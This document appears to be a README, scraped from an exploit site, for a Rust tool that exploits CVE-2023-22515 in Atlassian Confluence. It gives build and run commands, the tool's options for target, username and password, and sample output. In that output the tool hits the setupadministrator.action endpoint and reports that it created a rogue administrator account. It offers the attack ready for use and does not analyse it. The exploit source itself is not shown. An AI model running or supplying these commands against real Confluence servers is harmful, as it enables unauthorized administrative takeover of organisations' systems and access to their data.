## https://sploitus.com/exploit?id=04BF2F80-14B5-571E-A4A1-A7FF92AE4EC1
# CVE-2023-22515
<p align="left">
<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>
- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)
# Overview
Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.
The vulnerability has been classified as ```CVE-2023-22515```
# Compile
First perform the compilation with the command:
```sh
cargo build --release
```
# Usage
You can do it in these two ways:
```sh
cargo run -- --target http://localhost --username "teste" --password "teste"
```
```sh
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
```
This will display help for the tool. Here are all the switches it supports:
```yaml
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
```
# Running CVE-2023-22515
```console
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
```